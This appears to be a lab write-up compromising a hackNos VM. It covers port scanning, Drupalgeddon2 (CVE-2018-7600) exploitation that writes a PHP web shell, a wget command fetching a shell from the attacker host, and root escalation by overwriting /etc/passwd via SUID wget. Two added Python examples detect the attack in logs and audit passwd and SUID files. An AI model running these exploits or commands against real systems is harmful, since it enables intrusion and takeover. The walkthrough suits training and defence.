Lab environment:
Target: 192.168.0.10
Attacker (Kali): 192.168.0.11
I. Information gathering
1. masscan quickly scans all ports and finds 22 and 80 open.
root@kali:~# masscan -p0-65535 --rate=2000 192.168.0.10
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 11:31:19 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.0.10
Discovered open port 80/tcp on 192.168.0.10
2. nmap probes ports 22 and 80 for service versions and vulnerabilities.
root@kali:~# nmap -sC -sV -p22,80 192.168.0.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 06:34 EST
Nmap scan report for 192.168.0.10
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
| 256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_ 256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:EA:58:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3. Starting with port 80, dirb brute-forces directories and finds Drupal.
root@kali:~# dirb http://192.168.0.10
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 15 06:35:33 2020
URL_BASE: http://192.168.0.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.10/ ----
==> DIRECTORY: http://192.168.0.10/drupal/
+ http://192.168.0.10/index.html (CODE:200|SIZE:11321)
+ http://192.168.0.10/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.0.10/drupal/ ----
==> DIRECTORY: http://192.168.0.10/drupal/includes/
+ http://192.168.0.10/drupal/index.php (CODE:200|SIZE:7647)
==> DIRECTORY: http://192.168.0.10/drupal/misc/
==> DIRECTORY: http://192.168.0.10/drupal/modules/
==> DIRECTORY: http://192.168.0.10/drupal/profiles/
+ http://192.168.0.10/drupal/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.0.10/drupal/scripts/
==> DIRECTORY: http://192.168.0.10/drupal/sites/
==> DIRECTORY: http://192.168.0.10/drupal/themes/
+ http://192.168.0.10/drupal/web.config (CODE:200|SIZE:2200)
+ http://192.168.0.10/drupal/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://192.168.0.10/drupal/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.10/drupal/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
4. whatweb shows version information and roughly confirms Drupal 7.
root@kali:~# whatweb http://192.168.0.10/drupal/
http://192.168.0.10/drupal/ [200 OK] Apache[2.4.18], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.10], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], Script[text/javascript], Title[Welcome to james | james], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN]
5. gobuster scans the web root / and the /drupal directory for txt files, turning up two sensitive files: /alexander.txt and /drupal/CHANGELOG.txt. CHANGELOG.txt pins the Drupal version to 7.57.
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10 -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.0.10
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/02/15 06:46:33 Starting gobuster
===============================================================
/drupal (Status: 301)
/alexander.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/02/15 06:47:31 Finished
===============================================================
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10/drupal/ -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.0.10/drupal/
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/02/15 06:47:40 Starting gobuster
===============================================================
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/includes (Status: 301)
/sites (Status: 301)
/profiles (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/INSTALL.txt (Status: 200)
/LICENSE.txt (Status: 200)
/CHANGELOG.txt (Status: 200)
/COPYRIGHT.txt (Status: 200)
/UPGRADE.txt (Status: 200)
===============================================================
2020/02/15 06:48:42 Finished
===============================================================
II. Getting a shell
1. Use the msf module exploit/unix/webapp/drupal_drupalgeddon2. When setting options, note that TARGETURI defaults to /; it has to be changed to the Drupal install directory, here /drupal. After run, you get an msf shell.
2. Getting a shell manually: on exploit-db, find the entry "2018-04-13 Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution WebApps PHP Hans Topo & g0tmi1k", follow its instructions to get a shell, then use Python for a reverse shell. Note that a bash reverse shell errors out here.
root@kali:~# gem install highline   # install the Ruby dependency highline
root@kali:~# git clone https://github.com/dreadlocked/Drupalgeddon2.git
root@kali:~/Drupalgeddon2# ls
drupalgeddon2-customizable-beta.rb drupalgeddon2.rb README.md
root@kali:~/Drupalgeddon2# ./drupalgeddon2.rb http://192.168.0.10/drupal/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.0.10/drupal/
--------------------------------------------------------------------------------
[+] Found : http://192.168.0.10/drupal/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.57
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo SEFWERIV
[+] Result : SEFWERIV
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.0.10/drupal/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.0.10/drupal/shell.php' -d 'c=hostname'
hackNos>>
3. Searching GitHub for drupal 7.57 turns up a Python version of the exploit. The -c parameter executes a command; wget can be used to pull a web shell over and get a reverse shell.
root@kali:~# git clone https://github.com/pimps/CVE-2018-7600.git
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "whoami"
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-y-Nt9_xZdA7YysBlakHYAmSIgsMMYKL2A4sB2nfMTdE
[*] Triggering exploit to execute: whoami
www-data
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "wget http://192.168.0.11/phpshell.txt -O phpshell.php"
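From the defender's side, the traffic the two exploit tools above generate is easy to spot in the Apache access log. The following is an added example, not code from the write-up or from the exploit tools: the log lines are constructed (CALLBACK and CMD stand in for the exploit's parameter values), the /drupal/ path, the shell.php file name and the form ID come from the page, and the render-array keys are the ones the CVE-2018-7600 fix filters out of user input.

```python
"""Flag CVE-2018-7600 (Drupalgeddon2) activity in Apache access logs.
Added example for this page, not code from the write-up or the tools it uses.
The log lines are constructed; /drupal/ and shell.php come from the page."""
import re
from urllib.parse import unquote

DRUPAL_ROOT = "/drupal/"
# PHP entry points that legitimately sit in a Drupal 7 root directory.
KNOWN_ROOT_PHP = {"index.php", "cron.php", "install.php", "update.php", "xmlrpc.php", "authorize.php"}
# Render-array keys that the CVE-2018-7600 fix strips from user-supplied input.
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#access_callback")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample traffic; CALLBACK and CMD stand in for the exploit's values.
SAMPLE_LOG = """\
192.168.0.11 - - [15/Feb/2020:06:50:01 -0500] "POST /drupal/?q=user/password&name%5B%23post_render%5D%5B%5D=CALLBACK&name%5B%23type%5D=markup&name%5B%23markup%5D=CMD HTTP/1.1" 200 9 "-" "Ruby"
192.168.0.11 - - [15/Feb/2020:06:50:40 -0500] "POST /drupal/?q=file/ajax/name/%23value/form-y-Nt9_xZdA7YysBlakHYAmSIgsMMYKL2A4sB2nfMTdE HTTP/1.1" 200 31 "-" "python-requests/2.22.0"
192.168.0.11 - - [15/Feb/2020:06:51:02 -0500] "POST /drupal/shell.php HTTP/1.1" 200 14 "-" "curl/7.67.0"
192.168.0.22 - - [15/Feb/2020:06:52:10 -0500] "GET /drupal/?q=user/password HTTP/1.1" 200 7647 "-" "Mozilla/5.0"
192.168.0.22 - - [15/Feb/2020:06:52:30 -0500] "GET /drupal/xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return the indicator names that match one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Decode twice: '#' travels as %23 and some clients encode the query a second time.
    target = unquote(unquote(m.group("target")))
    path = target.partition("?")[0]          # the query stays in 'target' for matching
    hits = []
    # Stage 1: a render-array key injected into the password-reset form field.
    if "user/password" in target and any(k in target for k in RENDER_KEYS):
        hits.append("render-array injection")
    # Stage 2 (Drupal 7): the poisoned form_build_id replayed through the file/ajax callback.
    if "file/ajax/" in target and "#value" in target:
        hits.append("form cache replay")
    # Post-exploitation: a PHP file in the Drupal root that is not a Drupal entry point.
    if path.startswith(DRUPAL_ROOT):
        rel = path[len(DRUPAL_ROOT):]
        if rel.endswith(".php") and "/" not in rel and rel not in KNOWN_ROOT_PHP:
            hits.append("unexpected root php: " + rel)
    return hits

def scan(log_text):
    """Map each flagged 1-based line number to its indicators."""
    hits = ((n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1))
    return {n: h for n, h in hits if h}
```

The third rule is the cheapest to run continuously: any request for a PHP file that Drupal did not ship in its root is worth an alert regardless of how it got there.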
III. Privilege escalation
1. Run LinEnum.sh; under "Possibly interesting SUID files" it lists wget.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackNos:/$
www-data@hackNos:/tmp$ git clone https://github.com/rebootuser/LinEnum.git
www-data@hackNos:/tmp/LinEnum$ ./LinEnum.sh
[-] SUID files:
-rwsr-xr-x 1 root root 159852 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 34680 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 36288 May 17 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 506200 May 9 2018 /usr/bin/wget
-rwsr-xr-x 1 root root 53128 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39560 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48264 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 26492 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 157424 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 34812 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 38900 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 506200 May 9 2018 /usr/bin/wget
Download the target's /etc/passwd back to the Kali machine and generate a password hash with the openssl command.
root@kali:~# openssl passwd -1 -salt suijishu 123456
$1$suijishu$pCi13H6xgVMoQBkitx4rg/
root@kali:~# echo 'hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash' >> passwd
Run wget on the target to overwrite its /etc/passwd, then su to hack; privilege escalation succeeds.
www-data@hackNos:/tmp$ wget http://192.168.0.11/passwd -O /etc/passwd
/etc/passwd 100%[===================>] 1.65K --.-KB/s in 0.002s
2020-02-15 18:48:32 (764 KB/s) - '/etc/passwd' saved [1685/1685]
www-data@hackNos:/tmp$ su - hack
su - hack
Password: 123456
root@hackNos:~#
IV. Side notes
1. The file alexander.txt: decode it with echo | base64 -d, then run the result through an online decoder to get james:Hacker@4514; these credentials turned out not to log in.
root@hackNos:/var/www/html# cat alexander.txt
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==
root@hackNos:/var/www/html# echo 'KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+++.
2. Quickly start a web server on the Kali attack machine with Python.
root@kali:~# python -m SimpleHTTPServer 80 &
[2] 4963
[1] Killed python -m SimpleHTTPServer 80
root@kali:~# Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.22 - - [15/Feb/2020 08:34:22] "GET / HTTP/1.1" 200 -
192.168.0.22 - - [15/Feb/2020 08:34:31] "GET /shell.txt HTTP/1.1" 200 -
3. Two find commands for locating SUID files
www-data@hackNos:/tmp$ find / -user root -perm -4000 -print 2>/dev/null   # -perm -4000: every file whose mode includes the setuid bit (4000)
www-data@hackNos:/tmp$ find / -perm -u=s -type f 2>/dev/null   # -perm -u=s: every regular file with the user setuid bit set
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/wget
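The escalation in section III leaves two artefacts a host check can catch: a second UID 0 account whose hash sits in /etc/passwd rather than /etc/shadow, and a SUID binary (wget) that is not part of the recorded baseline the find commands in IV.3 would produce on a clean host. The following is an added example, not code from the write-up or from LinEnum; the passwd excerpt and the SUID sets are constructed from the page's own output (the baseline is a short subset, which a real deployment would record from a known-good host).

```python
"""Audit /etc/passwd and the SUID inventory for the tampering shown above.
Added example for this page, not from the write-up or LinEnum. Inputs are
constructed: the passwd excerpt ends with the entry the write-up appended."""
import re

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash
"""
# Constructed SUID baseline (a subset of the page's find output) and a later snapshot.
SUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/bin/su", "/bin/mount", "/bin/ping"}
SUID_NOW = SUID_BASELINE | {"/usr/bin/wget"}

HASH_RE = re.compile(r"^\$[0-9a-z]+\$")   # crypt(3)-style hash such as $1$salt$digest

def audit_passwd(text):
    """Return findings for one /etc/passwd body; an empty list means clean."""
    findings, uid_owner = [], {}
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:                  # e.g. a file mangled by a blind overwrite
            findings.append(f"line {n}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"{name}: UID 0 account that is not root")
        if HASH_RE.match(pw):                 # hash belongs in /etc/shadow, not here
            findings.append(f"{name}: password hash in /etc/passwd instead of /etc/shadow")
        if uid in uid_owner:                  # duplicate UIDs share one identity
            findings.append(f"{name}: shares UID {uid} with {uid_owner[uid]}")
        uid_owner.setdefault(uid, name)
    return findings

def unexpected_suid(observed, baseline):
    """SUID binaries present now that were not in the recorded baseline."""
    return sorted(set(observed) - set(baseline))
```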